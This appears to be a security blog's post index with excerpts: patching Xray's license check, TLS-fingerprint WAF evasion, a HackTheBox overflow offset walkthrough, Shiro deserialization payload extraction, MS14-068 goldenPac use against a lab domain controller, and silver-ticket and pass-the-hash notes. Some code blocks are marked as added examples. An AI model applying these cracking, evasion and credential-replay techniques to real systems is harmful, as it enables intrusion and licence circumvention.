wubba lubba dub dub.
post @ 2023-12-24

This post exists because Xray reached EOL. The last version is 1.9.11.

1. Patching Walkthrough for x86

  1. run the program

./xray_darwin_amd64
this license is expired, expiration time is 2022-08-03 08:00:00
  2. find and locate the string

00000000: 74 68 69 73 20 6c 69 63 65 6e 73 65 20 69 73 20  this license is 
00000010: 65 78 70 69 72 65 64 2c 20 65 78 70 69 72 61 74 expired, expirat
00000020: 69 6f 6e 20 74 69 6d 65 20 69 73 20 25 73 ion time is %s

  3. find references

04f92ba3  e838fdffff         call    sub_4f928e0
04f92ba8 440f11bc24980000…movups xmmword [rsp+0x98 {var_48}], xmm15
04f92bb1 e8eabf07ff call sub_400eba0
04f92bb6 488d0dc3d46800 lea rcx, [rel data_5620080]
04f92bbd 48898c2498000000 mov qword [rsp+0x98 {var_48}], rcx {data_5620080}
04f92bc5 48898424a0000000 mov qword [rsp+0xa0 {var_48+0x8}], rax
04f92bcd 488d05657aab00 lea rax, [rel data_5a4a639] {"this license is expired, expirat…"}
04f92bd4 bb2e000000 mov ebx, 0x2e
04f92bd9 488d8c2498000000 lea rcx, [rsp+0x98 {var_48}]
04f92be1 bf01000000 mov edi, 0x1
04f92be6 4889fe mov rsi, rdi {0x1}
04f92be9 e8d21417ff call sub_41040c0
04f92bee 4889d9 mov rcx, rbx {0x2e}
04f92bf1 4889c3 mov rbx, rax
04f92bf4 31c0 xor eax, eax {0x0}
04f92bf6 488bac24d8000000 mov rbp, qword [rsp+0xd8 {__saved_rbp}]
04f92bfe 4881c4e0000000 add rsp, 0xe0
04f92c05 c3 retn {__return_addr}

04f92ba3 is reached by the conditional jump at 04f92a26

04f92a1f  488b5838           mov     rbx, qword [rax+0x38]
04f92a23 4839fb cmp rbx, rdi
04f92a26 0f8c77010000 jl 0x4f92ba3
Read More
post @ 2021-04-18

SSL Fingerprint and Bypass

While working on a certain site a while ago I noticed that the same request got different responses depending on which client sent it, which was rather mysterious

Python 403 Burp 200?

First, the results of the request as sent by two different clients

Burp


Python3 Requests

The same request copied into Python 3 and sent with requests:

<body data-spm="7663354">
<div data-spm="1998410538">
<div class="header">
<div class="container">
<div class="message">
很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断。
<div>您的请求ID是: <strong>
276aedd416186716424122798e3951</strong></div>
</div>
</div>
</div>
<div class="main">
<div class="container">

Same URL, same parameters, same HTTP headers: the request sent from Burp gets a normal response, the one sent from Python is blocked by the WAF, and a curl reproduction of the request is blocked as well
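One mechanism that produces exactly this split is a TLS ClientHello fingerprint such as JA3: the WAF hashes the cipher suites, extensions and curves a client offers, so Burp, python-requests and curl already look different before a single HTTP header is read. The following added example (not from the original post) computes the JA3 string and hash from a raw ClientHello record; the two ClientHellos it compares are constructed inline for the demo, not captures.

```python
import hashlib
import struct
GREASE = {(v << 8) | v for v in range(0x0a, 0x100, 0x10)}   # RFC 8701 GREASE values: random per connection, so JA3 drops them
def ja3(record: bytes) -> str:
    """JA3 string for a raw TLS record carrying a ClientHello:
    version,ciphers,extensions,supported_groups,ec_point_formats (decimal, dash-joined)."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    pos = 9                                    # record header (5) + handshake header (4)
    version = struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2 + 32                              # client_version, random
    pos += 1 + record[pos]                     # session_id
    cs_len = struct.unpack("!H", record[pos:pos + 2])[0]; pos += 2
    ciphers = [c for c in struct.unpack(f"!{cs_len // 2}H", record[pos:pos + cs_len]) if c not in GREASE]
    pos += cs_len
    pos += 1 + record[pos]                     # compression_methods
    exts, groups, formats = [], [], []
    if pos < len(record):                      # the extensions block is optional
        end = pos + 2 + struct.unpack("!H", record[pos:pos + 2])[0]; pos += 2
        while pos < end:
            etype, elen = struct.unpack("!HH", record[pos:pos + 4]); pos += 4
            data = record[pos:pos + elen]; pos += elen
            if etype in GREASE:
                continue
            exts.append(etype)
            if etype == 10:                    # supported_groups (elliptic curves)
                n = struct.unpack("!H", data[:2])[0]
                groups = [g for g in struct.unpack(f"!{n // 2}H", data[2:2 + n]) if g not in GREASE]
            elif etype == 11:                  # ec_point_formats
                formats = list(data[1:1 + data[0]])
    dash = lambda xs: "-".join(map(str, xs))
    return ",".join([str(version), dash(ciphers), dash(exts), dash(groups), dash(formats)])
def ja3_hash(record: bytes) -> str:
    return hashlib.md5(ja3(record).encode()).hexdigest()   # the 32-hex-char form a WAF rule would match on
def build_client_hello(ciphers, exts, version=0x0303):
    """Constructed ClientHello for the demo (not a capture); exts is a list of (type, data)."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"              # version, random, empty session_id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                                  # one compression method: null
    ext = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in exts)
    body += struct.pack("!H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs
# Two constructed clients: same cipher suites and extensions in a different order, one adding a GREASE suite.
GROUPS = struct.pack("!HHH", 4, 0x001d, 0x0017)                          # x25519, secp256r1
CLIENT_A = build_client_hello([0x1301, 0xc02b], [(0, b""), (10, GROUPS), (11, b"\x01\x00")])
CLIENT_B = build_client_hello([0xc02b, 0x1301, 0x0a0a], [(10, GROUPS), (11, b"\x01\x00"), (0, b"")])
```

Running `ja3_hash` over both clients gives two different hashes even though the HTTP layer is identical, which is all a fingerprint-based WAF rule needs to treat them differently.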

Read More
post @ 2021-04-14

HTB - You know 0xDiablos

Checksec

➜  You know 0xDiablos checksec vuln
[*] '/mnt/hgfs/aresx/pwn/htb/You know 0xDiablos/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

Fuzz

➜  You know 0xDiablos cyclic 500 > out
➜ You know 0xDiablos gdb-gef --ex run ./vuln < out
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
GEF for linux ready, type `gef' to start, `gef config' to configure
92 commands loaded for GDB 9.1 using Python engine 3.8
Starting program: /mnt/hgfs/aresx/pwn/htb/You know 0xDiablos/vuln
You know who are 0xDiablos:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae

Program received signal SIGSEGV, Segmentation fault.
0x62616177 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0x1f5
$ebx : 0x62616175 ("uaab"?)
$ecx : 0xffffffff
$edx : 0xffffffff
$esp : 0xffffd370 → "xaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaacka[...]"
$ebp : 0x62616176 ("vaab"?)
$esi : 0xf7fb3000 → 0x001e9d6c
$edi : 0xf7fb3000 → 0x001e9d6c
$eip : 0x62616177 ("waab"?)
$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd370│+0x0000: "xaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaacka[...]"$esp
0xffffd374│+0x0004: "yaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaacla[...]"
0xffffd378│+0x0008: "zaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma[...]"
0xffffd37c│+0x000c: "baaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacna[...]"
0xffffd380│+0x0010: "caacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoa[...]"
0xffffd384│+0x0014: "daaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpa[...]"
0xffffd388│+0x0018: "eaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqa[...]"
0xffffd38c│+0x001c: "faacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacra[...]"
──────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x62616177
──────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "vuln", stopped 0x62616177 in ?? (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────── trace ────
─────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ quit

Find offset

  • eip

➜  You know 0xDiablos cyclic -l 0x62616177
188

  • esp

➜  You know 0xDiablos cyclic -l xaab
192
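The two `cyclic -l` answers above can be reproduced without pwntools. This added example (not from the original post, and not pwntools' own code) builds the same de Bruijn pattern and maps a crash register value or a stack word back to its offset in the 500-byte input, which is the crash-triage step the post performs by hand.

```python
import functools
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"

@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet: str = ALPHABET, n: int = 4) -> str:
    """De Bruijn sequence B(k, n) over `alphabet` (FKM algorithm): every n-char
    window occurs exactly once, so any 4 bytes read out of a crash map back to
    a single offset. This is the construction pwntools' cyclic uses."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []
    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)
    db(1, 1)
    return "".join(seq)

def cyclic(length: int) -> bytes:
    """Same output as `cyclic LENGTH`: the first LENGTH bytes of the pattern."""
    return de_bruijn()[:length].encode()

def cyclic_find(value, length: int = 500) -> int:
    """Same answer as `cyclic -l VALUE`. Accepts a 4-char str/bytes such as "xaab"
    or a register value such as 0x62616177, which is packed little-endian because
    that is the byte order in which it was loaded from the stack."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    elif isinstance(value, str):
        value = value.encode()
    return cyclic(length).find(value)   # -1 if the value did not come from the pattern

def triage(crash_eip: int, esp_word: str) -> dict:
    """Offsets for the two values GEF showed: the faulting EIP and the word at ESP."""
    return {"eip": cyclic_find(crash_eip), "esp": cyclic_find(esp_word)}

if __name__ == "__main__":
    print(cyclic(500).decode())        # the pattern the post redirected into ./vuln
    print(triage(0x62616177, "xaab"))  # eip at 188, esp at 192, as the post found
```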
Read More

Docsify auto generate sidebar.md

Project layout

╰─➤ ls -l
total 408
drwxr-xr-x 9 aresx staff 288 2 20 11:50 VulWiki
-rw-r--r--@ 1 aresx staff 140136 2 20 11:51 _sidebar.md
-rw-r--r--@ 1 aresx staff 1895 11 3 23:49 index.html
-rwxr-xr-x 1 aresx staff 1025 10 16 13:30 sidebar.sh

Copy the script into the same directory as index.html and run it there

Note: change the directory in root_dir (line 25) to the directory that holds the Markdown files

#!/bin/bash
IFS=$(echo -en "\n\b")   # split only on newlines so names containing spaces survive
function getdir(){
for element in $(ls -1 "$1")
do
dir_or_file="$1/$element"
counter=$(echo "$dir_or_file" | grep -o / | wc -l)
let counter-=2   # nesting depth below root_dir, used as the sidebar indent
if [ -d "$dir_or_file" ] ;
then
# a directory becomes an unlinked list item, then its contents are listed beneath it
printf '%0.s ' $(seq 0 $counter) >> _sidebar.md
echo "- $element" >> _sidebar.md
getdir "$dir_or_file"
else
echo "$dir_or_file"
printf '%0.s ' $(seq 0 $counter) >> _sidebar.md
path=$(echo "$dir_or_file" | sed "s/[ ]/%20/g" | sed "s/[+]/%2B/g")   # URL-encode spaces and '+' so the link works
title=$(echo "$element" | sed 's/\.md$//')
echo "- [$title](./$path)" >> _sidebar.md
fi
done
}

root_dir=$(ls -d VulWiki/*/)   # line 25: point this at the directory that holds the Markdown files
#root_dir=$(ls -d */ "$1/VulWiki" | sed 's/\///g')
:> _sidebar.md
for dir in $root_dir
do
if [ "$dir" = "." ]
then
continue
else
C1=$(echo "$dir" | cut -f2 -d '/')
echo "- $C1" | cut -f2 -d '/' >> _sidebar.md
getdir "$(echo "$dir" | sed 's/.$//')"
fi
done

The script recursively scans every Markdown file in the directories under root_dir, in order

╰─➤ ls -d VulWiki/*/
VulWiki/IOT安全/ VulWiki/Web安全/ VulWiki/系统安全/

and it handles spaces and '+' signs in file names, so the generated links do not end up unclickable

Read More

Shiro: exploitation under the newer versions' encryption scheme

The change in encryption scheme

Newer Shiro versions switched the encryption from AES-CBC to AES-GCM; because of that algorithm change, the exploit written for shiro-550 no longer applies to the new Shiro

The mode change came with the fix for the padding oracle attack: version 1.4.2 switched to AES-GCM

In the newer versions, encryption and decryption go through AesCipherService:

private byte[] cipherKey;
private CipherService cipherService = new AesCipherService();

public byte[] encrypt(byte[] serialized) {
    ByteSource byteSource = cipherService.encrypt(serialized, cipherKey);
    return byteSource.getBytes();
}

public byte[] decrypt(byte[] encrypted) {
    ByteSource byteSource = cipherService.decrypt(encrypted, cipherKey);
    return byteSource.getBytes();
}

AesCipherService is configured with AES-GCM and a padding scheme of NONE

In GCM mode padding is not a concern at all: the encrypted body has the same length as the plaintext

public class AesCipherService extends DefaultBlockCipherService {
    private static final String ALGORITHM_NAME = "AES";

    public AesCipherService() {
        super("AES");
        this.setMode(OperationMode.GCM);            // GCM for both block and streaming operation
        this.setStreamingMode(OperationMode.GCM);
        this.setPaddingScheme(PaddingScheme.NONE);  // GCM needs no padding
    }

    protected AlgorithmParameterSpec createParameterSpec(byte[] iv, boolean streaming) {
        // Same logic as the decompiled one-line ternary, written out: when the active mode
        // is GCM, build a GCMParameterSpec whose tag length (in bits) is taken from the key size.
        boolean gcm = streaming
                ? OperationMode.GCM.name().equals(this.getStreamingModeName())
                : OperationMode.GCM.name().equals(this.getModeName());
        return gcm ? new GCMParameterSpec(this.getKeySize(), iv)
                   : super.createParameterSpec(iv, streaming);
    }
}
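To see what the 1.4.2 change buys, the following added example (not Shiro's code; it uses the Python `cryptography` library) implements the old CBC/PKCS7 scheme and the new GCM scheme side by side and flips single bits in each ciphertext: CBC yields two distinguishable outcomes, which is the signal a padding oracle needs, while GCM yields exactly one. The 16-byte IV prefix, the 128-bit tag and the key are assumptions chosen to match AesCipherService with a 128-bit key.

```python
import os
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed 128-bit key, not a real Shiro key
IV_SIZE = 16   # assumption: a 16-byte IV is prepended to the ciphertext, as AesCipherService does

def gcm_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Shiro >= 1.4.2 style: AES-GCM, no padding, 128-bit tag; output is iv || ciphertext || tag."""
    iv = os.urandom(IV_SIZE)
    return iv + AESGCM(key).encrypt(iv, plaintext, None)

def gcm_decrypt(key: bytes, blob: bytes) -> bytes:
    return AESGCM(key).decrypt(blob[:IV_SIZE], blob[IV_SIZE:], None)   # InvalidTag on any change at all

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Pre-1.4.2 style: AES-CBC with PKCS7 padding; output is iv || ciphertext."""
    iv = os.urandom(IV_SIZE)
    padder = padding.PKCS7(128).padder()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return iv + enc.update(padder.update(plaintext) + padder.finalize()) + enc.finalize()

def cbc_decrypt(key: bytes, blob: bytes) -> bytes:
    dec = Cipher(algorithms.AES(key), modes.CBC(blob[:IV_SIZE])).decryptor()
    unpadder = padding.PKCS7(128).unpadder()
    padded = dec.update(blob[IV_SIZE:]) + dec.finalize()
    return unpadder.update(padded) + unpadder.finalize()   # ValueError only when the padding is malformed

def tamper_outcomes(decrypt, key: bytes, blob: bytes) -> set:
    """Flip the low bit of each byte in the block preceding the last ciphertext block (in CBC that
    edits the final plaintext block) and collect how the decryptor reacts. Two distinct outcomes
    are what a padding oracle needs; GCM's tag check collapses everything into one."""
    outcomes = set()
    for i in range(len(blob) - 2 * IV_SIZE, len(blob) - IV_SIZE):
        forged = bytearray(blob)
        forged[i] ^= 1
        try:
            decrypt(key, bytes(forged))
            outcomes.add("accepted")
        except InvalidTag:
            outcomes.add("invalid tag")
        except ValueError:
            outcomes.add("bad padding")
    return outcomes

if __name__ == "__main__":
    msg = b"rememberMe=ok"   # 13 bytes: the GCM body stays 13 bytes, CBC pads it to 16
    print(tamper_outcomes(cbc_decrypt, KEY, cbc_encrypt(KEY, msg)))  # {'accepted', 'bad padding'}
    print(tamper_outcomes(gcm_decrypt, KEY, gcm_encrypt(KEY, msg)))  # {'invalid tag'}
```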

Encryption and decryption implementation

Read More

Shiro deserialization: extracting Xray's six Tomcat echo gadget payloads

The new Xray version supports Shiro deserialization detection, provided you hold an advanced-edition license

For Shiro deserialization detection it first tries the six echo gadgets with the default key, then tries the out-of-band (reverse-connection) platform, and only after all of that fails does it brute-force with its 100 built-in keys

The valuable part is the six payloads that echo on every Tomcat version

Configure Xray to send its traffic through the Burp proxy, then set both the HTTP and TCP timeouts in the config file to 2 seconds

After starting the interceptor, let the first request (the one that checks whether Shiro is in use) through, then turn interception on and wait for the scan to finish; the payloads used for detection then show up in HTTP History. By intercepting repeatedly, dropping the payloads in order, and editing the response headers to contain the Testecho marker the detection looks for, you can tell which gadget each payload corresponds to

They are CommonsCollections1, CommonsCollections2, CommonsBeanutils1, CommonsBeanutils2, Jdk7u21 and Jdk8u20

Once a payload is obtained, decrypt it and save it as base64; that makes it easy to use in cases where the target does not use the default key and the key has to be changed

The extracted payloads are in the script below

https://github.com/Ares-X/shiro-exploit.git

Read More

How can you study Java without at least pretending to debug some code? Take Shiro as the example: the most convenient vulnerable environment is a prebuilt Docker image from a range like Vulhub, but you don't have the source that was used to build the image, so how do you debug it?

Getting the code

Create a new empty project

The code for the vulnerable environment has to be pulled out of Docker. Taking Shiro as the example: after starting it, enter the container with docker exec -it xxx /bin/bash and find the program of the vulnerable environment

The environment turns out to be packaged as a jar and started with java -jar, so copying shirodemo-1.0-SNAPSHOT.jar out gives you the entire contents of the vulnerable environment

docker cp a7:/shirodemo-1.0-SNAPSHOT.jar ./

Restoring the code

Debugging needs the source files locally. A jar can be added to the project as a Library, and IDEA will then decompile the classes back into source automatically, but after adding it you find that the jar's lib directory contains more jars; those nested jars cannot be added as Libraries in turn, so their code stays invisible

Instead, the jar can be unpacked directly into the project root

Read More
post @ 2020-03-23

Background: while exploiting the MS14-068 privilege escalation vulnerability, I tried the goldenPac module from the impacket toolkit to get a shell on the domain controller directly

Partway through it failed with the error Attempted "__iter__" operation on ASN.1 schema object

C:\Users\leo\Desktop>goldenPac.exe sun.com/leo:123.com@dc.sun.com
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] User SID: S-1-5-21-3388020223-1982701712-4030140183-1110
[*] Forest SID: S-1-5-21-3388020223-1982701712-4030140183
[*] Attacking domain controller DC.sun.com
[-] Attempted "__iter__" operation on ASN.1 schema object

At first I suspected a problem with the packaged exe's runtime environment, but after setting up a proxy into the internal network and running goldenPac.py through proxychains, the same error appeared

aresx@XXXXXXXXXX:/mnt/e$ proxychains goldenPac.py sun.com/leo:123.com@dc.sun.com
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:445 ... OK
[*] User SID: S-1-5-21-3388020223-1982701712-4030140183-1110
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:445 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:445 ... OK
[*] Forest SID: S-1-5-21-3388020223-1982701712-4030140183
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:135 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... sun.com:49155 ... OK
[*] Attacking domain controller DC.sun.com
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[proxychains] Strict chain ... 192.168.10.134:33080 ... DC.sun.com:88 ... OK
[-] Attempted "__iter__" operation on ASN.1 schema object

After a lot of googling I found that the same error had been reported as an issue on other open-source projects; the cause is a bug in the pyasn1 library, and the fix I followed was the one that uses an older pyasn1 version

pip list confirmed that the installed pyasn1 version was 0.4.8

aresx@XXXXXXXXXX:/mnt/e$ pip list
Package Version
----------------------------- --------
args 0.1.0
asn1crypto 0.24.0
atomicwrites 1.1.5
attrs 18.2.0
backports.functools-lru-cache 1.5
beautifulsoup4 4.7.1
certifi 2019.3.9
cffi 1.14.0
chardet 3.0.4
Click 7.0
clint 0.5.1
colorama 0.4.1
configparser 3.5.0b2
contextlib2 0.5.5
crackmapexec 3.1.5
cryptography 2.8
dirhunt 0.6.0
distorm3 3.4.1
dnspython 1.16.0
entrypoints 0.3
enum34 1.1.6
et-xmlfile 1.0.1
Flask 1.1.1
funcsigs 1.0.2
future 0.18.2
pathlib2 2.3.5
Pillow 6.2.1
pip 18.1
pluggy 0.13.0
proxy-db 0.2.3
py 1.8.1
py2-ipaddress 3.4.1
pyasn1 0.4.8

Uninstall it and install the older version 0.4.5

Read More

Domain Penetration Study (1): Windows Authentication Mechanisms
Domain Penetration Study (2): The Kerberos Protocol
Domain Penetration Study (3): Information Gathering Inside the Domain
Domain Penetration Study (4): Dump Password & Hash
Domain Penetration Study (5): IPC-based Remote Connections
Domain Penetration Study (6): PTH Pass-the-Hash Attacks

PTT Pass-the-Ticket Attacks

Review: Domain Penetration Study (2): The Kerberos Protocol

Silver Tickets

Characteristics:

  • No interaction with the KDC is needed
  • Requires the NTLM hash of the target server

The composition of a Ticket, from the earlier Kerberos authentication post:

Ticket=Server Hash(Server Session Key+Client info+End Time)

With the Server (Service) hash in hand, a Ticket can be forged that never goes through KDC authentication.
Until the Ticket is sent, the server has no idea what the Server Session Key is, so everything hinges on the Server hash.

Obtaining the Server hash

Read More

Domain Penetration Study (1): Windows Authentication Mechanisms
Domain Penetration Study (2): The Kerberos Protocol
Domain Penetration Study (3): Information Gathering Inside the Domain
Domain Penetration Study (4): Dump Password & Hash
Domain Penetration Study (5): IPC-based Remote Connections

PTH Pass-the-Hash Attacks

As covered in the Windows authentication post (the Net-NTLM network authentication section), once you have the NTLM hash of a user on the target machine, authentication can be completed with that hash directly, with no need to crack it

For hash extraction see Domain Penetration Study (4): Dump Password & Hash

For example, the NTLM hash obtained here: 4d01fbeeaf2b706478943e0889df5622

Tools that can perform Pass the Hash:

Note that PTH is still implemented on top of IPC remote connections, so the account-privilege considerations are the same as those described in Domain Penetration Study (5): IPC-based Remote Connections

See in particular: user-privilege issues with IPC connections and Psexec

impacket

Read More